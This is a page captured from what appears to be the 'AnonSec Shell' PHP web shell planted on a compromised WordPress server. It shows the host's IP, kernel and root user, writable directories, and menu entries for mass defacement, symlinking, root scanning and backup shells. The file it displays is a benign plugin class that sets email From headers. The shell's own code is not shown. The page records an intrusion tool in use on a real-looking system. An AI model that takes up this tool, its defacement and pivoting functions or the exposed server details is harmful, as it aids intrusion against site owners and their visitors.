AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.145.18.228   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/check-email/include/Core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/check-email/include/Core/Check_Email_From_Handler.php
<?php namespace CheckEmail\Core;

defined( 'ABSPATH' ) || exit; // Exit if accessed directly

class Check_Email_From_Handler {
    
    public $options;
    /**
    * Constructor
    */
    public function __construct() {

        $this->options = get_option('check-email-log-core', false);
        
        add_filter( 'wp_mail', array( $this, 'override_values'), 15 );
        add_filter( 'wp_mail_from', array($this, 'set_wp_mail_from' ), 99 );
        add_filter( 'wp_mail_from_name', array($this, 'set_wp_mail_from_name' ), 99 );
    }


    /**
    * Overrides the current wp_mail_from with the one from settings.
    *
    * @param String $email - Wordpress current mail from address.
    * @return String $email - "From" email address set in settings if it exists, else return the $email unchanged
    *
    * @since 1.0.5
    */
    public function set_wp_mail_from( $email ){
        if( $this->override_enabled() && isset( $this->options['email_from_email'] ) && '' != $this->options['email_from_email']){
            return $this->options['email_from_email'];
        }
    
        return $email;
    }

   /**
    * Overrides the current wp_mail_from_name with the one from settings.
    *
    * @param String $name - Wordpress current mail from name.
    * @return String $name - "From" name set in settings if it exists, else return the $name unchanged
    *
    * @since 1.0.5
    */
    public function set_wp_mail_from_name( $name ){
        if( $this->override_enabled() && isset( $this->options['email_from_name'] ) && '' != $this->options['email_from_name']){
            return $this->options['email_from_name'];
        }

        return $name;
    }
   /**
    * Check if the setting to override the default from email and from name is active.
    *
    * @since 1.0.5
    */
    public function override_enabled(){

        if( $this->options && isset( $this->options['override_emails_from'] ) && $this->options['override_emails_from'] ){
            return true;
        }

        return false;
    }

   /**
    * Replaces the current wp_mail $headers with the values from settings.
    *
    * @param Array $headers - Wordpress current mail headers
    * @return Array $headers - New headers from settings
    *
    * @since 1.0.5
    */    
    public function override_values( $headers ) {
        if( $this->override_enabled() && isset( $this->options['email_from_email'] ) && '' != $this->options['email_from_email']){
           
            $headers['headers'] = "MIME-Version: 1.0\r\n";

            $email = $this->options['email_from_email'];
 
            if( $this->override_enabled() && isset( $this->options['email_from_name'] ) && '' != $this->options['email_from_name'] ){
                
                $headers['headers'] .= "From: " . $this->options['email_from_name'] . " <". $email .">\r\n" ;
            }else{
               
                $headers['headers'] .= "From: <". $email .">\r\n" ;
            }

            $headers['headers'] .= "Content-Type: text/html; charset=\"UTF-8\"\r\n";
        }


        return $headers;
    }
}

Anon7 - 2022
AnonSec Team